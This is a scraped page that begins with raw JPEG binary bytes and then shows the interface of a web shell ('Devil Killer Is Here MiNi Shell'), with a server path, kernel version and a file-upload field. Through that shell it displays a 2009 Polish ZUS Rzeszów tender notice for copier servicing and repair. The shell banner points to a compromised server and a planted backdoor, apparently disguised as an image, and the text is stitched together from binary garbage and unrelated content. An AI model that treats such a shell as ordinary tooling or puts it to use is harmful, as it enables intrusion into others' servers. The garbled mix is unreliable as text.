JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090130/12296-N-2009.html

<p class="kh_header"><b>Rzeszów: Wykonywanie serwisu i napraw kserokopiarek w O/ZUS w Rzeszowie i podległych Inspektoratach</b><br>
<b>Numer ogłoszenia: 12296 - 2009; data zamieszczenia: 30.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych Oddział w Rzeszowie , Al. Piłsudskiego 12, 35-075 Rzeszów, woj. podkarpackie, tel. 017 8675000, faks 017 8523638.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie serwisu i napraw kserokopiarek w O/ZUS w Rzeszowie i podległych Inspektoratach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia dla części 1 zamówienia - kopiarki OCE

1. Przedmiot zamówienia obejmuje następujące typy kopiarek OCE 3165
Lokalizacja:
O /ZUS Rzeszów al. Piłsudskiego 12    - 2 szt.
Insp. / Przeworsk  ul. Dworcowa     1            -  1 szt.        
     
2. W ramach umowy Wykonawca zobowiązuje się wykonywać poniższe prace zgodnie z dokumentacją techniczną oraz wymogami i zaleceniami producenta:
a)  konserwację kserokopiarek
b)  usuwanie awarii kserokopiarek
a) dostawy materiałów eksploatacyjnych, części zamiennych i tonerów.

 3. Ustala się harmonogram usług dotyczący Oddziału ZUS i Inspektoratu:
a)  konserwacja - raz w miesiącu.
b) Usunięcie awarii kserokopiarek w czasie nie dłuższym niż 3 dni po otrzymaniu pisemnego lub telefonicznego powiadomienia Zleceniobiorcy. Do czasu naprawy nie wlicza się: dni wolnych od pracy u Zamawiającego, niedziel i świąt.

 4. Wykonawca zobowiązany jest do zapewnienia prawidłowego funkcjonowania przyjętych w ramach umowy kserokopiarek w sposób zapewniający wykonywanie kopii dobrej jakości poprzez dostarczanie materiałów eksploatacyjnych, części zamiennych, tonerów, usuwanie awarii i konserwację.
 5. Wykonawca zobowiązuje się do wpisywania w protokołach czynności serwisowych wszelkich prac związanych z konserwacją, przeglądami, regulacjami i naprawami kserokopiarek oraz aktualnego stanu licznika.
 6. Wykonawca ponosi odpowiedzialność za szkody powstałe z jego winy podczas wykonywania prac będących przedmiotem umowy oraz za uszkodzenie sprzętu Zmawiającego powstałe podczas wykonywania czynności serwisowych,
7. Wykonawca zobowiązany jest, przed zakończeniem umowy lub po jej zerwaniu z przyczyn lezących po stronie Wykonawcy , do wykonania końcowego przeglądu kserokopiarek. Przegląd taki ma za zadanie sprawdzenie, czy przekazywany sprzęt jest w pełni sprawny i funkcjonalny. Za sprzęt w pełni sprawny i funkcjonalny  uznany zostanie sprzęt , w którym:
- działają wszystkie funkcje maszyny.
- działają wszystkie urządzenia końcowe (finiszer, zszywacz). Zamawiający zobowiązany jest do zapewnienia wymaganej ilości zszywek i papieru do przeprowadzenia wymaganych testów. Ich brak nie upoważnia do odmowy podpisania Raportu Serwisowego, w takim przypadku uznaje się, ze maszyna jest sprawna.
- jest dobra jakość kopii. Jako wzorzec zostanie użyty dokument tekstowy dostarczony przez Zamawiającego zawierający czytelny tekst wydrukowany w czarnym kolorze na białym papierze. Strony uznają, że jakość kopii jest dobra, jeżeli kopia wykonana z wzorca będzie czytelna, bez rozmazań, zabrudzeń, smug i pasów.
8. Po spełnieniu warunków określonych w ust.7 w Raporcie Serwisowym zostaną dokonane wpisy: maszyna jest sprawna na zakończenie wizyty, kopie próbne wykonano, w uwagach - jakość kopii dobra - bez zastrzeżeń.
9. Jeżeli przegląd końcowy wykaże niesprawność maszyny, Wykonawca ma 5 dni roboczych na wykonanie niezbędnych napraw i doprowadzenie kserokopiarki do stanu pełnej sprawności, co musi być potwierdzone raportem Serwisowym na warunkach określonych  w ust. 7 i 8.
10. W przypadku jeżeli Wykonawca nie dotrzyma terminu określonego w pkt. 9 zobowiązany jest do zapłacenia kary umownej w wysokości 6 000,00 (sześć tysięcy) zł za każde urządzenie OCE, którego nie dało się doprowadzić do pełnej sprawności technicznej w ciągu 5 dni roboczych od zakończenia umowy.
 11.Jeżeli naprawa kopiarek potrwa dłużej niż 3 dni Wykonawca zobowiązany jest w tym czasie do dostarczenia kopiarki zastępczej o parametrach zbliżonych do kopiarki zepsutej. W przypadku niezrealizowania naprawy w ciągu 21 dni zostaną naliczane kary umowne za każdy dzień zwłoki w naprawie zgodnie z ust.16 .
 12. Na wykonane naprawy Wykonawca udziela 3 miesięcznej gwarancji na zasadach określonych     przepisami  kodeksu cywilnego.

13.Kwota wykonania kopii obejmuje koszty:
a) materiałów eksploatacyjnych (w tym tonery) oraz części zamiennych (dostarczone części zamienne oraz tonery muszą być oryginalne nie regenerowane),
b) materiałów zużytych podczas wykonywania konserwacji,
c) usuwania awarii wraz z usuwaniem uszkodzeń mechanicznych,
d) czynności konserwacyjnych wykonywanych zgodnie z wymogami i zaleceniami producenta urządzeń,
e) robocizny 
f) dojazdu w celu wykonania serwisu, napraw.
g) transportu kserokopiarek w przypadku konieczności ich naprawy w siedzibie Zleceniobiorcy
 
14.Cena  kopii nie obejmuje kosztów papieru do wykonywania kopii.
15. Podstawę wynagrodzenia za wykonywanie czynności będących przedmiotem zamówienia stanowi cena 100 kopii w wysokości:
 netto: ............ zł. (słownie: ...............),
 podatek od towarów i usług - VAT: 22 %, tj. ................. zł.,
 brutto: ................. zł. (słownie: ..........................................).
 
Wynagrodzenie za wykonywanie czynności będących przedmiotem umowy wypłacane będzie Wykonawcy każdorazowo po wykonaniu konserwacji, w wysokości obliczonej według następującego wzoru:

cena brutto 100 kopii x   liczba wykonanych kopii w okresie rozliczeniowym 
100

16. Zamawiającemu przysługują kary umowne:
a) w przypadku opóźnienia w wykonaniu czynności będących przedmiotem umowy Zamawiający obciąży Wykonawcę karami umownymi w wysokości 200,00 zł /dwieście złotych/ za każdy dzień opóźnienia  w naprawie kserokopiarek powyżej 21 dni od daty zgłoszenia. W takim przypadku kserokopiarka zastępcza pozostaje w dalszym ciągu u Zamawiającego .
b) w przypadku odstąpienia od umowy przez Zamawiającego z powodu okoliczności, za które odpowiada Wykonawca w wysokości 20% kwoty  wartości zamówienia.
17.W przypadku gdy w okresie rozliczeniowym (tj. raz w miesiącu) Wykonawca nie wykona konserwacji wynagrodzenie za ten okres nie przysługuje.

18.Zużyte materiały w tym materiały eksploatacyjne, tonery oraz części zamienne stają się własnością Wykonawcy.
19. Zamawiający zastrzega sobie prawo zmiany miejsca użytkowania kserokopiarek w poszczególnych terenowych jednostkach organizacyjnych O/ZUS Rzeszów. Zmiana ta nie będzie powodować zmiany wynagrodzenia.
20. Zamawiający na podstawie pisemnej prośby Oferenta udostępni kserokopiarki w celu ich oględzin w uzgodnionym terminie.


 Opis przedmiotu zamówienia dla części 2 zamówienia - pozostałe kopiarki

Przedmiotem zamówienia jest dostarczenie tonerów, materiałów eksploatacyjnych i części zamiennych oraz świadczenie usług serwisowych polegających na pogwarancyjnym usuwaniu usterek i okresowych czynnościach przeglądowych kserokopiarek ZUS Oddział w Rzeszowie oraz podległych Inspektoratach.

1. Przedmiot zamówienia obejmuje następujące typy kopiarek:
1.1. Kopiarki GESTETNER 3235
a) w Oddziale ZUS w Rzeszowie przy   ul. 8 Marca 3                            -2 szt.
b) w Oddziale ZUS w Rzeszowie przy   ul. Piłsudskiego 12                   -1 szt.
c) w Oddziale ZUS w Rzeszowie przy   ul. Siemiradzkiego 10               -1 szt. 
d) w Inspektoracie ZUS w Mielcu przy ul. Sikorskiego 4                      -1 szt. 
e) w Inspektoracie ZUS w Leżajsku przy ul. Mickiewicza 24                -1 szt.
f) w Inspektoracie ZUS w Przeworsku przy ul. Dworcowej 1               - 2 szt.
g) w Inspektoracie ZUS w Jarosławiu przy  ul. Słowackiego 21           -1 szt.
h) w Inspektoracie ZUS w Przemyślu przy  ul.  Brodzińskiego 6          -1 szt.
i) w Inspektoracie ZUS w Tarnobrzegu przy  ul. Sienkiewicza 145D   -1 szt.

1.2. Kopiarki Kyocera Mita 4530 
a) w Oddziale ZUS w Rzeszowie przy   ul. Piłsudskiego 12                    -1 szt.
b) w Oddziale ZUS w Rzeszowie przy   ul. Niepodległości 3                   -1 szt.
c) w Inspektoracie ZUS w Stalowej Woli przy  ul. Popiełuszki 8            -1 szt.
d) w Inspektoracie ZUS w Przemyślu przy  ul.  Brodzińskiego 6           -1 szt.
e) w Biurze Terenowym w Lubaczowie przy ul. Legionów 4                   -1 szt.

1.3. Kopiarki Ricoch 350
a) w Oddziale ZUS w Rzeszowie przy ulicy Piłsudskiego 12                   -2 szt.
1.4. Kopiarka Nashuatec
a) w Oddziale ZUS w Rzeszowie przy ulicy Piłsudskiego 12                   -1 szt.

      
2. W ramach umowy Wykonawca zobowiązuje się wykonywać poniższe prace zgodnie z dokumentacją techniczną oraz wymogami i zaleceniami producenta:
a)  konserwację kserokopiarek
b)  usuwanie awarii kserokopiarek
c)  dostawy materiałów eksploatacyjnych, części zamiennych i tonerów.
 
3. Ustala się harmonogram usług dotyczący Oddziału ZUS i Inspektoratu:
a)  konserwacja - raz w miesiącu.
c) Usunięcie awarii kserokopiarek w czasie nie dłuższym niż 3 dni po otrzymaniu pisemnego lub telefonicznego powiadomienia Zleceniobiorcy. Do czasu naprawy nie wlicza się: dni wolnych od pracy u Zamawiającego, niedziel i świąt.

 4. Wykonawca zobowiązany jest do zapewnienia prawidłowego funkcjonowania przyjętych w ramach umowy kserokopiarek w sposób zapewniający wykonywanie kopii dobrej jakości poprzez dostarczanie materiałów eksploatacyjnych, części zamiennych, tonerów, usuwanie awarii i konserwację.
 5. Wykonawca zobowiązuje się do wpisywania w protokołach czynności serwisowych wszelkich prac związanych z konserwacją, przeglądami, regulacjami i naprawami kserokopiarek oraz aktualnego stanu licznika.
 6. Wykonawca ponosi odpowiedzialność za szkody powstałe z jego winy podczas wykonywania prac będących przedmiotem umowy oraz za uszkodzenie sprzętu Zmawiającego powstałe podczas wykonywania czynności serwisowych,
 7.Wykonawca zobowiązany jest, po zakończeniu umowy lub zerwaniu umowy z przyczyn leżących po jego stronie, do protokolarnego przekazania kserokopiarek w stanie pełnej sprawności technicznej i wykonującej kopie dobrej jakości nie budzące zastrzeżeń Zamawiającego w terminie do 2 dni od zakończenia lub zerwania umowy. W przypadku nie dotrzymania powyższego terminu Zamawiającemu przysługuje kara umowna w wysokości  6000,00 zł /słownie sześć tysięcy złotych/, za każdą z kserokopiarek, które nie zostały przekazane w pełnej sprawności technicznej.
 8.Jeżeli naprawa kopiarek potrwa dłużej niż 3 dni Wykonawca zobowiązany jest w tym czasie do dostarczenia kopiarki zastępczej o parametrach zbliżonych do kopiarki zepsutej. W przypadku niezrealizowania naprawy w ciągu 21 dni zostaną naliczane kary umowne za każdy dzień zwłoki w naprawie zgodnie z pkt.13 .
 9. Na wykonane naprawy Wykonawca udziela 3 miesięcznej gwarancji na zasadach określonych     przepisami  kodeksu cywilnego.

10.Kwota wykonania kopii obejmuje koszty:
a)materiałów eksploatacyjnych (w tym tonery) oraz części zamiennych (dostarczone części zamienne oraz tonery muszą być oryginalne nie regenerowane),
b)materiałów zużytych podczas wykonywania konserwacji,
c) usuwania awarii wraz z usuwaniem uszkodzeń mechanicznych,
d) czynności konserwacyjnych wykonywanych zgodnie z wymogami i zaleceniami producenta urządzeń,
e) robocizny 
f) dojazdu w celu wykonania serwisu, napraw.
g) transportu kserokopiarek w przypadku konieczności ich naprawy w siedzibie Zleceniobiorcy
 
11.Cena  kopii nie obejmuje kosztów papieru do wykonywania kopii.

12. Podstawę wynagrodzenia za wykonywanie czynności będących przedmiotem zamówienia stanowi cena 100 kopii wykonanych na kserokopiarce  w wysokości:
 netto: ............ zł. (słownie: ...............),
 podatek od towarów i usług - VAT: 22 %, tj. ................. zł.,
 brutto: ................. zł. (słownie: ..........................................).
 
Wynagrodzenie za wykonywanie czynności będących przedmiotem umowy wypłacane będzie Wykonawcy każdorazowo po wykonaniu konserwacji, w wysokości obliczonej według następującego wzoru:

cena brutto 100 kopii x   liczba wykonanych kopii w okresie rozliczeniowym 
100

13. Zamawiającemu przysługują kary umowne:
a) w przypadku opóźnienia w wykonaniu czynności będących przedmiotem umowy Zamawiający obciąży Wykonawcę karami umownymi w wysokości 200,00 zł /dwieście złotych/ za każdy dzień opóźnienia  w naprawie kserokopiarek powyżej 21 dni od daty zgłoszenia. W takim przypadku kserokopiarka zastępcza pozostaje w dalszym ciągu u Zamawiającego .
b) w przypadku odstąpienia od umowy przez Zamawiającego z powodu okoliczności, za które odpowiada Wykonawca w wysokości 20% kwoty  wartości zamówienia.
14.W przypadku gdy w okresie rozliczeniowym (tj. raz w miesiącu) Wykonawca nie wykona konserwacji wynagrodzenie za ten okres nie przysługuje.

15.Zużyte materiały w tym materiały eksploatacyjne, tonery oraz części zamienne stają się własnością Wykonawcy.
16.Zamawiający zastrzega sobie prawo zmiany miejsca użytkowania kserokopiarek w poszczególnych terenowych jednostkach organizacyjnych O/ZUS Rzeszów. Zmiana ta nie będzie powodować zmiany wynagrodzenia.
17. Zamawiający na podstawie pisemnej prośby Oferenta udostępni kserokopiarki w celu ich oględzin w uzgodnionym terminie.

Sposób obliczania ceny oferty

1. Wykonawca w przedstawionej ofercie cenowej winien zaoferować cenę kompletną, jednoznaczną 
i ostateczną łącznie z podatkiem VAT naliczonym zgodnie z obowiązującymi przepisami w tym zakresie.
1.1. Wszelkie, ewentualne, udzielone przez Wykonawcę rabaty, bonifikaty, promocje, upusty muszą być uwzględnione w cenach jednostkowych.
Cena 100 kopii nie podlega zmianie w okresie obowiązywania umowy.

2. Wykonawca w cenie oferty musi uwzględnić, odpowiednio dla każdego z modeli kserokopiarek, wszelkie niezbędne koszty serwisu pogwarancyjnego (łącznie z kosztem robocizny i dojazdu do miejsca użytkowania kserokopiarek) w zakresie zapewniającym stałe utrzymanie kserokopiarek w pełnej sprawności techniczno-użytkowej przez okres obowiązywania umowy .

Innymi słowy, cena wydrukowania 100 sztuki kopii, odpowiednio dla każdego z modeli kserokopiarek, musi uwzględnić wszelkie (za wyjątkiem papieru) niezbędne koszty do ich wydrukowania oraz stałego utrzymania kserokopiarki w pełnej sprawności techniczno - użytkowej przez cały okres zawartej umowy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 50.31.31.00-3, 50.31.32.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium w wysokości 1100,00 zł (słownie: jeden tysiąc sto złotych) - tylko dla części 2 zamówienia , dla części 1 zamówienia wadium nie jest wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1.1. spełniają warunki udziału w postępowaniu określone w art. 22 ust. 1 ustawy - Prawo zamówień publicznych, tzn:
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonywania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.

Warunek powyższy będzie spełniony jeżeli (Dotyczy tylko części  1 zamówienia):
1.1.1.) wykonawca wykonywał ( a w przypadku świadczeń okresowych  lub ciągłych również wykonuje) w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jedną usługę polegającą na obsłudze serwisowej kserokopiarek cyfrowych OCE, o wartości umowy nie mniejszej niż 30 000 zł brutto; 
1.1.2.) wykonawca dysponuje lub będzie dysponował co najmniej 1 osobą uczestniczącą w wykonaniu zamówienia, posiadającą kwalifikacje zawodowe do serwisowania kserokopiarek OCE potwierdzone imiennym dokumentem [np. certyfikat, świadectwo, itp.] stwierdzający kwalifikacje do serwisowania wydane przez producenta lub dystrybutora kserokopiarek;
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia 
d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego 

2. Zamawiający dokona oceny spełniania warunków metodą O (nie spełnia) - 1 (spełnia) na podstawie złożonych dokumentów.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Na potwierdzenie spełnienia warunków określonych w pkt. 1.1. Wykonawca złoży oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy - Prawo zamówień publicznych (formularz oświadczenia został określony załącznikiem nr 2 do SIWZ) oraz
1.1.  na potwierdzenie warunku określonego w pkt. 1.1. a  przedstawi (dla części 1 i części 2 zamówienia) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składnia ofert, 
1.2. na potwierdzenie warunku określonego w pkt. 1.1.1 przedstawi wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług polegających na obsłudze serwisowej kserokopiarek cyfrowych OCE, o wartości umowy nie mniejszej niż 30 000 zł brutto w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, ze usługi zostały wykonane należycie.
1.3. na potwierdzenie warunku określonego w pkt. 1.1.2 przedstawi wykaz osób którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyły w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia [np. czy posiadają certyfikat, świadectwo, itp. stwierdzający kwalifikacje do serwisowania wydane przez producenta lub dystrybutora kserokopiarek], a także zakresu wykonywanych przez nie czynności
1.4. na potwierdzenie spełnienia warunku określonego w pkt. 1.1. d. Wykonawca złoży oświadczenie, że nie podlega wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 ustawy - Prawo zamówień publicznych (formularz oświadczenia został określony załącznikiem nr 3 do SIWZ) 
1.5.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu określonego w pkt. 1.1. składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości,

1.5.1. Dokument, o którym mowa w pkt. 1.5 powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w pkt. 1.5. Wykonawca składa dokument zawierający oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Terminy określone w pkt. 1.5.1. stosuje się odpowiednio.
-.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zus.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Ubezpieczeń Społecznych
Oddział w Rzeszowie Al. Piłsudskiego 12
35-075 Rzeszów
(Ul. Siemiradzkiego 8 pok. Nr 2).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.02.2009 godzina 10:00, miejsce: Zakład Ubezpieczeń Społecznych
Oddział w Rzeszowie Al. Piłsudskiego 12
35-075 Rzeszów
pok. Nr 23 - Dziennik podawczy.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Serwisowanie kopiarek OCE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia obejmuje następujące typy kopiarek OCE 3165
Lokalizacja:
O /ZUS Rzeszów al. Piłsudskiego 12    - 2 szt.
Insp/ Przeworsk  ul. Dworcowa     1            -  1 szt.        
     
2. W ramach umowy Wykonawca zobowiązuje się wykonywać poniższe prace zgodnie z dokumentacją techniczną oraz wymogami i zaleceniami producenta:
a)  konserwację kserokopiarek
b)  usuwanie awarii kserokopiarek
a) dostawy materiałów eksploatacyjnych, części zamiennych i tonerów.

 3. Ustala się harmonogram usług dotyczący Oddziału ZUS i Inspektoratu:
a)  konserwacja - raz w miesiącu.
b) Usunięcie awarii kserokopiarek w czasie nie dłuższym niż 3 dni po otrzymaniu pisemnego lub telefonicznego powiadomienia Zleceniobiorcy. Do czasu naprawy nie wlicza się: dni wolnych od pracy u Zamawiającego, niedziel i świąt.

 4. Wykonawca zobowiązany jest do zapewnienia prawidłowego funkcjonowania przyjętych w ramach umowy kserokopiarek w sposób zapewniający wykonywanie kopii dobrej jakości poprzez dostarczanie materiałów eksploatacyjnych, części zamiennych, tonerów, usuwanie awarii i konserwację.
 5. Wykonawca zobowiązuje się do wpisywania w protokołach czynności serwisowych wszelkich prac związanych z konserwacją, przeglądami, regulacjami i naprawami kserokopiarek oraz aktualnego stanu licznika.
 6. Wykonawca ponosi odpowiedzialność za szkody powstałe z jego winy podczas wykonywania prac będących przedmiotem umowy oraz za uszkodzenie sprzętu Zmawiającego powstałe podczas wykonywania czynności serwisowych,
